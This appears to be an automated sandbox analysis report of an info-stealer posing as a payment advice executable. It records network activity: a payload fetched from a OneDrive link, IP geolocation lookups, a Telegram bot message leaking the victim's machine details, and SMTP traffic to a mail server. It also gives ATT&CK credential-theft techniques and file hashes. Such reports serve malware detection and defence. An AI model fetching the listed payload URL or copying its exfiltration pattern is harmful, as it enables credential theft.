Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNksq%2BEQlyGF4kbQF4k94xvN%2FiacoRB8%2BWE5VELmPbYMb2HRWvVhbBGZYE2y28mbghSPbNFi6fh40l3FQWhO3a3BM%2FOrPcaKLMD5s4REigrhfXHNTEOORUVB%2FWAxf%2FKeMKP66B69"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bab8683dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=77787&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11717&recv_bytes=1034&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2245&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

PayeeAdvice_HK54912_R0038704_37504.exe

Remote address:

172.67.177.134:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Sat, 16 Nov 2024 15:49:34 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0hEZxsrRoqaJwEjavlY1C0HnnnqgMKZuGY%2BUJI7JzQgmsQSxmcLemmrPjBdzRCwHLH1vChfLXaC0qAAaxhHVKIS9MycNZXlBivRk3%2FeYZtut%2FUe1Y%2FEHImNW%2FZsahUqqaUUP5jpp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bcabd93dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=79428&sent=13&recv=22&lost=0&retrans=0&sent_bytes=12968&recv_bytes=1126&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2565&x=0"
DNS

73.247.226.132.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.247.226.132.in-addr.arpa

IN PTR

Response
DNS

134.177.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.177.67.172.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

PayeeAdvice_HK54912_R0038704_37504.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

PayeeAdvice_HK54912_R0038704_37504.exe

Remote address:

149.154.167.220:443

Request

GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sat, 16 Nov 2024 15:49:35 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

mail.foodex.com.pk

PayeeAdvice_HK54912_R0038704_37504.exe

Remote address:

8.8.8.8:53

Request

mail.foodex.com.pk

IN A

Response

mail.foodex.com.pk

IN CNAME

foodex.com.pk

foodex.com.pk

IN A

37.27.123.72
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

72.123.27.37.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.123.27.37.in-addr.arpa

IN PTR

Response

72.123.27.37.in-addr.arpa

IN PTR

server43 hndserversnet
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response

13.107.42.12:443

https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content

tls, http

PayeeAdvice_HK54912_R0038704_37504.exe

1.2kB
10.9kB
14
14

HTTP Request

GET https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content

HTTP Response

302
13.107.42.12:443

https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin

tls, http

PayeeAdvice_HK54912_R0038704_37504.exe

11.1kB
297.8kB
223
223

HTTP Request

GET https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin

HTTP Response

200
132.226.247.73:80

http://checkip.dyndns.org/

http

PayeeAdvice_HK54912_R0038704_37504.exe

2.3kB
3.8kB
23
14

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
172.67.177.134:443

https://reallyfreegeoip.org/xml/181.215.176.83

tls, http

PayeeAdvice_HK54912_R0038704_37504.exe

2.2kB
14.9kB
25
16

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

tls, http

PayeeAdvice_HK54912_R0038704_37504.exe

1.2kB
6.7kB
11
11

HTTP Request

GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

HTTP Response

404
37.27.123.72:587

mail.foodex.com.pk

smtp-submission

PayeeAdvice_HK54912_R0038704_37504.exe

2.0kB
1.3kB
16
17

8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

api.onedrive.com

dns

PayeeAdvice_HK54912_R0038704_37504.exe

62 B
284 B
1
1

DNS Request

api.onedrive.com

DNS Response

13.107.42.12
8.8.8.8:53

fa3hwa.dm.files.1drv.com

dns

PayeeAdvice_HK54912_R0038704_37504.exe

70 B
279 B
1
1

DNS Request

fa3hwa.dm.files.1drv.com

DNS Response

13.107.42.12
8.8.8.8:53

12.42.107.13.in-addr.arpa

dns

71 B
92 B
1
1

DNS Request

12.42.107.13.in-addr.arpa
8.8.8.8:53

checkip.dyndns.org

dns

PayeeAdvice_HK54912_R0038704_37504.exe

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

132.226.247.73

193.122.6.168

193.122.130.0

158.101.44.242

132.226.8.169
8.8.8.8:53

reallyfreegeoip.org

dns

PayeeAdvice_HK54912_R0038704_37504.exe

65 B
97 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

172.67.177.134

104.21.67.152
8.8.8.8:53

73.247.226.132.in-addr.arpa

dns

73 B
158 B
1
1

DNS Request

73.247.226.132.in-addr.arpa
8.8.8.8:53

134.177.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

134.177.67.172.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

PayeeAdvice_HK54912_R0038704_37504.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

mail.foodex.com.pk

dns

PayeeAdvice_HK54912_R0038704_37504.exe

64 B
94 B
1
1

DNS Request

mail.foodex.com.pk

DNS Response

37.27.123.72
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

72.123.27.37.in-addr.arpa

dns

71 B
108 B
1
1

DNS Request

72.123.27.37.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsn9ABB.tmp\System.dll

Filesize
11KB

MD5
fc90dfb694d0e17b013d6f818bce41b0

SHA1
3243969886d640af3bfa442728b9f0dff9d5f5b0

SHA256
7fe77ca13121a113c59630a3dba0c8aaa6372e8082393274da8f8608c4ce4528

SHA512
324f13aa7a33c6408e2a57c3484d1691ecee7c3c1366de2bb8978c8dc66b18425d8cab5a32d1702c13c43703e36148a022263de7166afdce141da2b01169f1c6

Download Submit
memory/1948-25-0x00000000398E0000-0x0000000039E84000-memory.dmp

Filesize
5.6MB

Download
memory/1948-26-0x0000000039E90000-0x0000000039F2C000-memory.dmp

Filesize
624KB

Download
memory/1948-36-0x000000003AD20000-0x000000003AD2A000-memory.dmp

Filesize
40KB

Download
memory/1948-35-0x000000003AC30000-0x000000003ACC2000-memory.dmp

Filesize
584KB

Download
memory/1948-16-0x0000000077D85000-0x0000000077D86000-memory.dmp

Filesize
4KB

Download
memory/1948-22-0x0000000077CE1000-0x0000000077E01000-memory.dmp

Filesize
1.1MB

Download
memory/1948-20-0x0000000000480000-0x00000000016D4000-memory.dmp

Filesize
18.3MB

Download
memory/1948-23-0x0000000072BDE000-0x0000000072BDF000-memory.dmp

Filesize
4KB

Download
memory/1948-33-0x0000000072BD0000-0x0000000073380000-memory.dmp

Filesize
7.7MB

Download
memory/1948-24-0x0000000000480000-0x00000000004CA000-memory.dmp

Filesize
296KB

Download
memory/1948-15-0x0000000077D68000-0x0000000077D69000-memory.dmp

Filesize
4KB

Download
memory/1948-27-0x0000000072BD0000-0x0000000073380000-memory.dmp

Filesize
7.7MB

Download
memory/1948-28-0x000000003A3F0000-0x000000003A5B2000-memory.dmp

Filesize
1.8MB

Download
memory/1948-29-0x000000003A5D0000-0x000000003A620000-memory.dmp

Filesize
320KB

Download
memory/1948-31-0x0000000072BDE000-0x0000000072BDF000-memory.dmp

Filesize
4KB

Download
memory/1948-32-0x000000003A6B0000-0x000000003ABDC000-memory.dmp

Filesize
5.2MB

Download
memory/2600-13-0x0000000077CE1000-0x0000000077E01000-memory.dmp

Filesize
1.1MB

Download
memory/2600-12-0x0000000077CE1000-0x0000000077E01000-memory.dmp

Filesize
1.1MB

Download
memory/2600-14-0x0000000010004000-0x0000000010005000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request